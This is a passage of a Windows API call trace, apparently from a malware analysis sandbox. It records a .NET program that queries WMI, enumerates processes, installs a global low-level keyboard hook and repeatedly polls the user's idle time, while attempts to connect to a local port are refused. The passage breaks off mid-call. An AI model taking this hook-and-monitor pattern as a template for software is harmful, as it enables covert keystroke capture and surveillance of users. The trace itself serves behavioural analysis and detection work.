[0206.551] WbemLocator:IClassFactory:CreateInstance (in: This=0x67c790, pUnkOuter=0x0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19e9c8 | out: ppvObject=0x1b19e9c8*=0x67c7d0) returned 0x0 [0206.551] WbemLocator:IUnknown:Release (This=0x67c790) returned 0x0 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19e7d8 | out: ppvObject=0x1b19e7d8*=0x67c7d0) returned 0x0 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7cf6928*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1b19e880 | out: ppvObject=0x1b19e880*=0x0) returned 0x80004002 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7cf6978*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x1b19e088 | out: ppvObject=0x1b19e088*=0x0) returned 0x80004002 [0206.551] WbemLocator:IUnknown:AddRef (This=0x67c7d0) returned 0x3 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7cf6938*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1b19df28 | out: ppvObject=0x1b19df28*=0x0) returned 0x80004002 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7cf6948*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1b19deb0 | out: ppvObject=0x1b19deb0*=0x0) returned 0x80004002 [0206.551] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7cf5da0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19dea0 | out: ppvObject=0x1b19dea0*=0x0) returned 0x80004002 [0206.551] CoGetContextToken (in: pToken=0x1b19df50 | out: pToken=0x1b19df50) returned 0x0 [0206.552] CoGetContextToken (in: pToken=0x1b19e3d0 | out: pToken=0x1b19e3d0) returned 0x0 [0206.552] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19e490 | out: ppvObject=0x1b19e490*=0x0) returned 0x80004002 [0206.552] WbemLocator:IUnknown:Release (This=0x67c7d0) returned 0x2 [0206.552] WbemLocator:IUnknown:Release (This=0x67c7d0) returned 0x1 [0206.552] CoGetContextToken (in: pToken=0x1b19ef80 | out: pToken=0x1b19ef80) returned 0x0 [0206.552] CoGetContextToken (in: pToken=0x1b19ee80 | out: pToken=0x1b19ee80) returned 0x0 [0206.553] WbemLocator:IUnknown:QueryInterface (in: This=0x67c7d0, riid=0x1b19efe0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1b19efb0 | out: ppvObject=0x1b19efb0*=0x67c7d0) returned 0x0 [0206.553] WbemLocator:IUnknown:AddRef (This=0x67c7d0) returned 0x3 [0206.553] WbemLocator:IUnknown:Release (This=0x67c7d0) returned 0x2 [0206.553] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x1b19f3b0 | out: puCount=0x1b19f3b0*=0x2) returned 0x0 [0206.553] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=8, puBuffLength=0x1b19f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x1b19f3a8*=0xf, pszText=0x0) returned 0x0 [0206.553] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=8, puBuffLength=0x1b19f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x1b19f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.553] CoCreateInstance (in: rclsid=0x7fffad19b060*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffad19b0c0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1b19f0f0 | out: ppv=0x1b19f0f0*=0x67c850) returned 0x0 [0206.553] WbemLocator:IWbemLocator:ConnectServer (in: This=0x67c850, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1b19f258 | out: ppNamespace=0x1b19f258*=0x66e600) returned 0x0 [0207.546] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19ef68 | out: ppvObject=0x1b19ef68*=0x66bca8) returned 0x0 [0207.546] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66bca8, pProxy=0x66e600, pAuthnSvc=0x1b19f030, pAuthzSvc=0x1b19efb0, pServerPrincName=0x1b19efe0, pAuthnLevel=0x1b19efb4, pImpLevel=0x1b19efbc, pAuthInfo=0x1b19efe8, pCapabilites=0x1b19efb8 | out: pAuthnSvc=0x1b19f030*=0xa, pAuthzSvc=0x1b19efb0*=0x0, pServerPrincName=0x1b19efe0, pAuthnLevel=0x1b19efb4*=0x6, pImpLevel=0x1b19efbc*=0x2, pAuthInfo=0x1b19efe8, pCapabilites=0x1b19efb8*=0x1) returned 0x0 [0207.546] WbemLocator:IUnknown:Release (This=0x66bca8) returned 0x1 [0207.546] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19ef00 | out: ppvObject=0x1b19ef00*=0x66bcf0) returned 0x0 [0207.546] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19ef10 | out: ppvObject=0x1b19ef10*=0x66bca8) returned 0x0 [0207.546] WbemLocator:IClientSecurity:SetBlanket (This=0x66bca8, pProxy=0x66e600, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0207.547] WbemLocator:IUnknown:Release (This=0x66bca8) returned 0x2 [0207.547] WbemLocator:IUnknown:Release (This=0x66bcf0) returned 0x1 [0207.547] CoTaskMemFree (pv=0x666360) [0207.547] WbemLocator:IUnknown:AddRef (This=0x66e600) returned 0x2 [0207.547] WbemLocator:IUnknown:Release (This=0x67c850) returned 0x0 [0207.547] CoGetContextToken (in: pToken=0x1b19e170 | out: pToken=0x1b19e170) returned 0x0 [0207.547] CoGetContextToken (in: pToken=0x1b19e5f0 | out: pToken=0x1b19e5f0) returned 0x0 [0207.548] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1b19e570 | out: ppvObject=0x1b19e570*=0x66bcb8) returned 0x0 [0207.548] WbemLocator:IRpcOptions:Query (in: This=0x66bcb8, pPrx=0x65d140, dwProperty=2, pdwValue=0x1b19e6a0 | out: pdwValue=0x1b19e6a0) returned 0x80004002 [0207.548] WbemLocator:IUnknown:Release (This=0x66bcb8) returned 0x2 [0207.548] CoGetContextToken (in: pToken=0x1b19ecc0 | out: pToken=0x1b19ecc0) returned 0x0 [0207.548] CoGetContextToken (in: pToken=0x1b19ebc0 | out: pToken=0x1b19ebc0) returned 0x0 [0207.548] WbemLocator:IUnknown:QueryInterface (in: This=0x66e600, riid=0x1b19ed20*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1b19eb40 | out: ppvObject=0x1b19eb40*=0x66e600) returned 0x0 [0207.548] WbemLocator:IUnknown:Release (This=0x66e600) returned 0x2 [0207.548] SysStringLen (param_1=0x0) returned 0x0 [0207.548] CoUninitialize () Thread: id = 202 os_tid = 0x3bc Thread: id = 203 os_tid = 0xa88 Thread: id = 204 os_tid = 0x3b8 [0223.150] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0223.150] RoInitialize () returned 0x1 [0223.150] RoUninitialize () returned 0x0 [0223.153] ResetEvent (hEvent=0x430) returned 1 [0325.599] shutdown (s=0x618, how=2) returned -1 [0325.600] setsockopt (s=0x618, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0325.600] closesocket (s=0x618) returned 0 [0355.612] CoUninitialize () Thread: id = 206 os_tid = 0x3c0 Thread: id = 207 os_tid = 0x92c Thread: id = 273 os_tid = 0x1060 Thread: id = 339 os_tid = 0x1468 [0352.886] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0352.886] RoInitialize () returned 0x1 [0352.886] RoUninitialize () returned 0x0 [0354.266] GetCurrentProcessId () returned 0x1518 [0354.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x121e1a78, Length=0x20000, ResultLength=0x86f1e0 | out: SystemInformation=0x121e1a78, ResultLength=0x86f1e0*=0x23a68) returned 0xc0000004 [0354.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12201ab0, Length=0x26268, ResultLength=0x86f1e0 | out: SystemInformation=0x12201ab0, ResultLength=0x86f1e0*=0x23a68) returned 0x0 [0354.317] GetModuleHandleW (lpModuleName="LIVE-WindowsPlayer-version-492b7f0827474659") returned 0x0 [0354.352] SetWindowsHookExW (idHook=13, lpfn=0x560cec, hmod=0x0, dwThreadId=0x0) returned 0x701a5 [0354.375] GetCurrentProcess () returned 0xffffffffffffffff [0354.375] GetCurrentThread () returned 0xfffffffffffffffe [0354.375] GetCurrentProcess () returned 0xffffffffffffffff [0354.378] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x86f2a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x86f2a0*=0x684) returned 1 [0354.387] GetCurrentThreadId () returned 0x1468 [0354.417] GetCurrentProcess () returned 0xffffffffffffffff [0354.417] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x86eaf8 | out: TokenHandle=0x86eaf8*=0x6c0) returned 1 [0354.419] CloseHandle (hObject=0x6c0) returned 1 [0354.419] GetCurrentProcess () returned 0xffffffffffffffff [0354.419] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x86eb38 | out: TokenHandle=0x86eb38*=0x6c0) returned 1 [0354.421] CloseHandle (hObject=0x6c0) returned 1 [0354.452] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1d8 [0354.453] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1da [0354.465] GetSystemMetrics (nIndex=75) returned 1 [0354.520] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0354.588] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7fffcb440000 [0354.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x86eef0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15 [0354.589] GetProcAddress (hModule=0x7fffcb440000, lpProcName="AddDllDirectory") returned 0x7fffca81c9b0 [0354.589] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x7fffbc450000 [0354.618] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7fffcb7a0000 [0354.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x86ed70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW", lpUsedDefaultChar=0x0) returned 14 [0354.618] GetProcAddress (hModule=0x7fffcb7a0000, lpProcName="DefWindowProcW") returned 0x7fffccacaa60 [0354.619] GetStockObject (i=5) returned 0x900015 [0354.624] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0354.627] CoTaskMemAlloc (cb=0x5a) returned 0x1b00a540 [0354.627] RegisterClassW (lpWndClass=0x86ed30) returned 0xc1db [0354.627] CoTaskMemFree (pv=0x1b00a540) [0354.628] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0354.628] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.1f550a4_r6_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffffffffffd, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x70388 [0354.635] SetWindowLongPtrW (hWnd=0x70388, nIndex=-4, dwNewLong=0x7fffccacaa60) returned 0x560d3c [0354.639] GetWindowLongPtrW (hWnd=0x70388, nIndex=-4) returned 0x7fffccacaa60 [0354.644] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x86e078 | out: phkResult=0x86e078*=0x7a4) returned 0x0 [0354.644] RegQueryValueExW (in: hKey=0x7a4, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x86e0c8, lpData=0x0, lpcbData=0x86e0c0*=0x0 | out: lpType=0x86e0c8*=0x0, lpData=0x0, lpcbData=0x86e0c0*=0x0) returned 0x2 [0354.645] RegQueryValueExW (in: hKey=0x7a4, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x86e0c8, lpData=0x0, lpcbData=0x86e0c0*=0x0 | out: lpType=0x86e0c8*=0x0, lpData=0x0, lpcbData=0x86e0c0*=0x0) returned 0x2 [0354.649] RegCloseKey (hKey=0x7a4) returned 0x0 [0354.650] SetWindowLongPtrW (hWnd=0x70388, nIndex=-4, dwNewLong=0x560d8c) returned 0x7fffccacaa60 [0354.650] GetWindowLongPtrW (hWnd=0x70388, nIndex=-4) returned 0x560d8c [0354.650] GetWindowLongPtrW (hWnd=0x70388, nIndex=-16) returned 0x6c10000 [0354.654] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1d9 [0354.656] CallWindowProcW (lpPrevWndFunc=0x7fffccacaa60, hWnd=0x70388, Msg=0x24, wParam=0x0, lParam=0x86e770) returned 0x0 [0354.656] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1dd [0354.657] CallWindowProcW (lpPrevWndFunc=0x7fffccacaa60, hWnd=0x70388, Msg=0x81, wParam=0x0, lParam=0x86e6e0) returned 0x1 [0354.657] CallWindowProcW (lpPrevWndFunc=0x7fffccacaa60, hWnd=0x70388, Msg=0x83, wParam=0x0, lParam=0x86e790) returned 0x0 [0354.658] CallWindowProcW (lpPrevWndFunc=0x7fffccacaa60, hWnd=0x70388, Msg=0x1, wParam=0x0, lParam=0x86e6e0) returned 0x0 [0354.660] GetClientRect (in: hWnd=0x70388, lpRect=0x86e100 | out: lpRect=0x86e100) returned 1 [0354.660] GetWindowRect (in: hWnd=0x70388, lpRect=0x86e100 | out: lpRect=0x86e100) returned 1 [0354.749] GetParent (hWnd=0x70388) returned 0x0 [0354.803] OleInitialize (pvReserved=0x0) returned 0x80010106 [0354.806] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x86f238 | out: lplpMessageFilter=0x86f238*=0x0) returned 0x80004021 [0354.811] PeekMessageW (in: lpMsg=0x86f1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x86f1d0) returned 0 [0354.811] PeekMessageW (in: lpMsg=0x86f1d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x86f1d0) returned 0 [0354.812] WaitMessage () Thread: id = 340 os_tid = 0xf7c Thread: id = 342 os_tid = 0x49c [0353.303] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0353.303] RoInitialize () returned 0x1 [0353.303] RoUninitialize () returned 0x0 [0354.869] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0354.870] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0355.877] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0355.878] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0356.893] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0356.893] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0357.936] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0357.936] GetLastInputInfo (in: plii=0x21dc7a0 | out: plii=0x21dc7a0*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0358.940] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0358.940] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0359.957] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0359.959] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0360.965] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0360.965] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0361.971] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0361.971] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0363.038] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0363.038] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0364.049] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0364.049] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124cf2a)) returned 1 [0365.061] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124f734)) returned 1 [0366.075] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fb3c)) returned 1 [0366.075] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fb3c)) returned 1 [0367.117] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0367.117] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0368.164] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0368.164] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0369.211] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0369.211] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0370.244] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0370.245] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0371.258] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0371.258] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0372.264] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0372.265] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0373.321] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0373.321] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0374.327] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0374.327] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x124fd6e)) returned 1 [0375.341] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1251f5e)) returned 1 [0376.534] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0376.534] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0377.544] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0377.544] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0378.559] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0378.559] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0379.577] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0379.578] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0380.615] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0380.615] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0381.674] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0381.674] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0382.875] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0382.875] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0383.958] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0383.958] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1252113)) returned 1 [0388.844] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0389.904] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0389.904] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0391.084] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0391.084] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0392.104] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0392.104] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x1254891)) returned 1 [0396.868] GetLastInputInfo (in: plii=0x21d95b8 | out: plii=0x21d95b8*(cbSize=0x8, dwTime=0x125709b)) returned 1 Thread: id = 343 os_tid = 0xa5c [0354.062] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0354.062] RoInitialize () returned 0x1 [0354.062] RoUninitialize () returned 0x0 [0354.075] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0358.924] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b4 [0358.928] setsockopt (s=0x5b4, level=65535, optname=4098, optval="", optlen=4) returned 0 [0358.928] setsockopt (s=0x5b4, level=65535, optname=4097, optval="", optlen=4) returned 0 [0358.930] WSAConnect (in: s=0x5b4, name=0x222a338*(sa_family=2, sin_port=0x1b58, sin_addr="127.0.0.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0361.425] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274d, dwLanguageId=0x0, lpBuffer=0x1b3dec30, nSize=0x101, Arguments=0x0 | out: lpBuffer="No connection could be made because the target machine actively refused it.\r\n") returned 0x4d [0361.444] SetEvent (hEvent=0x3f0) returned 1 [0369.711] closesocket (s=0x5b4) returned 0 [0369.718] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5b4 [0369.719] setsockopt (s=0x5b4, level=65535, optname=4098, optval="", optlen=4) returned 0 [0369.719] setsockopt (s=0x5b4, level=65535, optname=4097, optval="", optlen=4) returned 0 [0369.719] WSAConnect (in: s=0x5b4, name=0x222ba40*(sa_family=2, sin_port=0x1b58, sin_addr="127.0.0.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0371.837] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274d, dwLanguageId=0x0, 